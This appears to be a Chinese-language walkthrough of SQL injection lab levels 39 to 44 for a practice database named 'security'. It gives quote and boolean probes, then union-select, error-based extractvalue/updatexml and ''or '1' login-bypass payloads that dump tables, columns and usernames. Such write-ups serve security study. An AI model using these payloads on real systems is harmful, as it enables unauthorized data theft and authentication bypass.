39.
依次输入以下内容进行测试：
1 成功
1' 报错
1" 报错
1 and 1=1 --+ 成功
1 and 1=2 --+ 失败
单引号、双引号都报错，而 and 1=1 成功、and 1=2 失败，由此知道是数字型注入（参数没有被引号包裹）
-1 union select 1,2,3 --+
-1 union select 1,database(),3 --+
-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1 union select 1,(select group_concat(username) from security.users),3 --+
40.
1'and 1=1 --+ 失败
1"and 1=1 --+ 成功
1"and 1=2 --+ 成功
1') and 1=1 --+ 成功
1') and 1=2 --+ 失败
双引号下 1=1 和 1=2 都成功，说明双引号没有起到闭合作用；') 下 1=1 成功、1=2 失败，得到闭合方式是 ')
-1')union select 1,2,3 --+
-1')union select 1,database(),3 --+
-1')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1')union select 1,(select group_concat(username) from security.users),3 --+
41.
输入
1 成功
1' 无回显
1" 无回显
1 and 1=1 --+ 成功
1 and 1=2 --+ 无回显
本关没有报错信息，只能看有无回显：and 1=1 成功、and 1=2 无回显，得到是数字型注入
-1 union select 1,2,3 --+
-1 union select 1,database(),3 --+
-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1 union select 1,(select group_concat(username) from security.users),3 --+
42.
在用户名处输入
1' 显示用户错误
1" 显示用户错误
用户名处无注入点
在密码处输入
1' 页面返回报错信息
1'# 显示用户错误
1' 报错，而 1'# 恢复为普通的用户错误提示，说明密码参数用单引号闭合，得到 1'#，注入点在密码处
使用报错注入（前提是页面会把数据库报错信息原样返回，如上面 1' 的结果）
1'and(extractvalue(1,concat(0x5c,database())))#
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
1'and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))#
43.
和上一关（42）一样测试，
发现闭合处还多一个括号：
1')#
1')and(extractvalue(1,concat(0x5c,database())))#
1')and(updatexml(1,concat(0x7e,database(),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#
1')and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))#
44.
这里不会返回报错信息，不能通过报错信息来判断闭合方式。
这里通过 or '1 构造恒真条件、看能否登录成功来判断。
用户
'or '1 登录失败
"or "1 登录失败
密码
'or '1 登录成功
"or "1 登录失败
1'union select 1,database(),3 #
这里不用 and / or 了；笔记称之为堆叠注入，但下面的语句实际都是 union select 联合查询，并没有用分号分隔的多条语句。
1'union select 1,2,3 #
1'union select 1,database(),3 #
1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
1'union select 1,(select group_concat(username) from security.users),3 #